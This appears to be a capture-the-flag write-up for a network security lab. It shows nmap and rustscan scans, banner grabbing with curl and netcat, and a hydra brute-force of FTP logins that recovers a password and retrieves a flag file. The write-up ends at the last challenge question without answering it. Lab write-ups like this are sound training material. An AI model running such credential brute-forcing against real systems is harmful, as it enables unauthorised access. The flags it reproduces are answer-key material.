Net Sec Challenge (Nmap, Netcat, FTP)

What is the highest port number being open less than 10,000?

$ nmap -A 10.10.77.197 | tee nmap.log
Starting Nmap 7.80 ( https://nmap.org ) at 2022-03-03 16:51 +0630
Nmap scan report for 10.10.77.197
Host is up (0.22s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         (protocol 2.0)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-OpenSSH_8.2p1 THM{946219583339}
80/tcp   open  http        lighttpd
|_http-server-header: lighttpd THM{web_server_25352}
|_http-title: Hello, world!
139/tcp  open  netbios-ssn Samba smbd 4.6.2
445/tcp  open  netbios-ssn Samba smbd 4.6.2
8080/tcp open  http        Node.js (Express middleware)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port22-TCP:V=7.80%I=7%D=3/3%Time=622096FE%P=x86_64-pc-linux-gnu%r(NULL,
SF:29,"SSH-2\.0-OpenSSH_8\.2p1\x20THM{946219583339}\r\n");

Host script results:
|_clock-skew: -41s
|_nbstat: NetBIOS name: NETSEC-CHALLENG, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-03-03T10:22:20
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.18 seconds

There is an open port outside the common 1000 ports; it is above 10,000. What is it?

$ rustscan -a 10.10.224.51
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/home/hnl/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.224.51:22
Open 10.10.224.51:80
Open 10.10.224.51:10021

How many TCP ports are open?

6

What is the flag hidden in the HTTP server header?

$ curl -v 10.10.224.51
*   Trying 10.10.224.51:80...
* TCP_NODELAY set
* Connected to 10.10.224.51 (10.10.224.51) port 80 (#0)
> GET / HTTP/1.1
> Host: 10.10.224.51
> User-Agent: curl/7.68.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Vary: Accept-Encoding
< Content-Type: text/html
< Accept-Ranges: bytes
< ETag: "229449419"
< Last-Modified: Tue, 14 Sep 2021 07:33:09 GMT
< Content-Length: 226
< Date: Thu, 03 Mar 2022 12:54:25 GMT
< Server: lighttpd THM{web_server_25352}
< 
<!DOCTYPE html>
<html lang="en">
<head>
  <title>Hello, world!</title>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width,initial-scale=1" />
</head>
<body>
  <h1>Hello, world!</h1>
</body>
</html>
* Connection #0 to host 10.10.224.51 left intact

What is the flag hidden in the SSH server header?

$ nc 10.10.224.51 22 
SSH-2.0-OpenSSH_8.2p1 THM{946219583339}

We have an FTP server listening on a nonstandard port. What is the version of the FTP server?

$ nmap -A -p10021 10.10.224.51 22 
Starting Nmap 7.80 ( https://nmap.org ) at 2022-03-03 19:26 +0630
Nmap scan report for 10.10.224.51
Host is up (0.47s latency).

PORT      STATE SERVICE VERSION
10021/tcp open  ftp     vsftpd 3.0.3
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (1 host up) scanned in 19.24 seconds

We learned two usernames using social engineering: eddie and quinn. What is the flag hidden in one of these two account files and accessible via FTP?

$ hydra -l quinn -P /usr/share/wordlists/rockyou.txt 10.10.224.51 ftp -s 10021
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-03-03 19:33:40
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ftp://10.10.224.51:10021/
[10021][ftp] host: 10.10.224.51   login: quinn   password: andrea
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-03-03 19:33:54

$ ftp 10.10.224.51 10021
Connected to 10.10.224.51.
220 (vsFTPd 3.0.3)
Name (10.10.224.51:hnl): quinn
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r--    1 1002     1002           18 Sep 20 08:27 ftp_flag.txt
226 Directory send OK.
ftp> get ftp_flag.txt
local: ftp_flag.txt remote: ftp_flag.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for ftp_flag.txt (18 bytes).
226 Transfer complete.
18 bytes received in 0.00 secs (4.1595 kB/s)
ftp> exit
221 Goodbye.

$ cat ftp_flag.txt 
THM{321452667098}

Browsing to http://10.10.224.51:8080 displays a small challenge that will give you a flag once you solve it. What is the flag?